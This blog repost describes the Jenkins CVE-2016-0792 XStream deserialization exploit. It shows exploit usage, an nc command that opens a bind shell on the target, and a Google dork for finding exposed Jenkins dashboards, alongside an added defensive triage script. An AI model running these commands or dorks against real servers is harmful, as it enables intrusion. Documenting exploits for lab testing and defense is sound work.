Jenkins CVE-2016-0792 Deserialization Remote Exploit – Penetration Testing

What is CVE-2016-0792?

Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
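A defender-side triage sketch for the description above, added here as an example and not part of the original post or the exploit repository: is_affected applies the version range quoted above, and flagged_types looks for the class the description names inside an XML request body. It assumes XStream carries the Java type in the element name or a class attribute; the function names and sample bodies are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Class named in the CVE-2016-0792 description on this page.
FLAGGED_CLASSES = {"groovy.util.Expando"}

# Constructed sample bodies (not captured traffic, no working payload).
SAMPLE_ELEMENT = b"<project><groovy.util.Expando/></project>"
SAMPLE_ATTR = b'<project><builder class="groovy.util.Expando"/></project>'
SAMPLE_CLEAN = b"<project><description>nightly build</description></project>"
SAMPLE_BROKEN = b"<project><groovy.util.Expando>"  # truncated, will not parse


def is_affected(version: str) -> bool:
    """True if the version is in the range quoted above:
    releases before 1.650, LTS releases before 1.642.2."""
    parts = tuple(int(p) for p in version.strip().split("."))
    if len(parts) >= 3:  # assumption: LTS versions carry a third component
        return parts < (1, 642, 2)
    return parts < (1, 650)


def flagged_types(xml_body: bytes) -> list:
    """Return the flagged class names an XML request body refers to."""
    root = None
    # Bodies with a DTD are not handed to the parser (entity expansion);
    # they, and bodies that fail to parse, get a raw substring search.
    if b"<!DOCTYPE" not in xml_body.upper():
        try:
            root = ET.fromstring(xml_body)
        except ET.ParseError:
            root = None
    if root is None:
        text = xml_body.decode("utf-8", "replace")
        return sorted(c for c in FLAGGED_CLASSES if c in text)
    seen = set()
    for el in root.iter():
        # Assumption: XStream carries the Java type in the element name
        # or in a `class` attribute, so both are checked.
        for name in (el.tag, el.get("class", "")):
            if name in FLAGGED_CLASSES:
                seen.add(name)
    return sorted(seen)


if __name__ == "__main__":
    for body in (SAMPLE_ELEMENT, SAMPLE_ATTR, SAMPLE_CLEAN, SAMPLE_BROKEN):
        print(flagged_types(body), body)
    for v in ("1.649", "1.650", "1.642.1", "1.642.2"):
        print(v, "affected" if is_affected(v) else "fixed")
```

A hit from flagged_types marks a request for inspection and does not by itself show exploitation; a server for which is_affected returns True needs the upgrade to the releases named above.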

Exploit

Jenkins CVE-2016-0792

Exploit for Jenkins serialization vulnerability – CVE-2016-0792

More information can be found at Contrast Security and Pentester Lab.

Requirements

Python 3.6.x

The requests library is required for this exploit to work:

sudo pip install requests

git clone http://ift.tt/2vfSwAm

Usage

python3

from exploit import exploit

exploit(url, command)

where url is the URL of the Jenkins server and command is the command to execute.

Example

exploit('http://ift.tt/2tRLOgm', '/usr/bin/nc -l -p 9999 -e /bin/sh')

This will run nc and listen on port 9999 on the vulnerable machine.

For demonstration purposes I will be running the ISO from Pentester Lab.

Google dork: intitle: “Dashboard [Jenkins]” + “Manage Jenkins”

The post Jenkins CVE-2016-0792 Deserialization Remote Exploit appeared first on Penetration Testing.
